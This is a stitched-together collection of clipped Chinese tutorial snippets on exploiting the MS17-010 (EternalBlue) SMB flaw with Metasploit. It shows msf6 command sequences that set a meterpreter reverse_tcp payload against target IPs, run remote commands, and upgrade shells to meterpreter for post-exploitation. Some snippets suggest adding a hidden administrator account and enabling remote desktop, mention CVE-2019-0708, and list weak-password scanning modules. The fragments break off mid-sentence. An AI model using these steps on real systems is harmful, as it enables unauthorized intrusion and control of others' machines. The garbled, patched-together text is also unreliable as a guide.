set command whoami set rhosts 10.0.0.154 #Win7的地址 run 3 ~ MS17-010(auxiliary/scanner/smb/smb_ms17_010) shell search ms17-010 use 3 options set rhosts 10.0.0.154 #Win7的地址 run (2)分别注明0~3漏洞利用模块的攻击效果和利用条件,完成漏洞修复 漏洞修复:Win7中下载ms17-010补丁 再次利用ms...
1. auxiliary/scanner/smb/smb_ms17_010 //扫描检测漏洞辅助模块 扫描结果这里可以看到 2,3,4这几台主机存在此漏洞! 2. auxiliary/admin/smb/ms17_010_command //扫描445在线主机 MS17_010漏洞利用需要开放445
msf6 > use auxiliary/scanner/smb/smb_ms17_010 //也可以用 use 3 msf6 auxiliary(scanner/smb...
auxiliary/scanner/smb/smb_login #SMB弱口令登录 auxiliary/admin/smb/psexec_command #登录SMB且执行命令 auxiliary/scanner/mssql/mssql_ping #MSSQL主机信息扫描 auxiliary/admin/mssql/mssql_enum #MSSQL枚举 auxiliary/scanner/mysql/mysql_login #MySQL弱口令扫描 auxiliary/admin/mysql/mysql_enum #MySQL枚举 ...
msf6 > search ms17_010 Matching Modules === # Name Disclosure Date Rank Check Description - --- --- --- --- --- 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 1 auxiliary/scanner/sm...
如果先获取了cmd,比如利用ms17-010,默认使用的payload返回的就是cmd。这时候我们可以使用sessions-u 2来将cmdshell升级成meterpreter。 获取到了meterpreter,就可以进行后渗透了。 4.1 基本系统命令 # 会话管理background#将当前会话放置后台sessions# 查看会话sessions -i# 切换会话quit# 关闭当前的会话,返回msf终端# ...
msf6> use auxiliary/admin/smb/ms17_010_command msf6> set command whoami msf6> run 利用思路:添加一个超级管理员权限的用户,开启它远程桌面服务 CVE-2019-0708-远程代码执行: 除了永恒之蓝还有 0708 可以快速获取到目标主机权限(前提目标开启了 3389,未打补丁),实际情况下很多单位都只打了永恒之蓝的补丁,...
使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue 使用info查看模块信息: info 设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp 查看模块需要配置的参数:show options 设置参数:set RHOST 192.168.125.138 攻击:exploit / run ...
使用search ms17-010命令来搜索MSF中有关永恒之蓝漏洞的模块如图所示,我们可以看到有一个专门用于扫描主机永恒之蓝漏洞的模块我们可以通过use 模块名或 use 模块ID的方式进行选中这里我采用的是第二种(因为懒。。。) 使用use 1命令进入永恒之蓝探测模块使用...
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution ...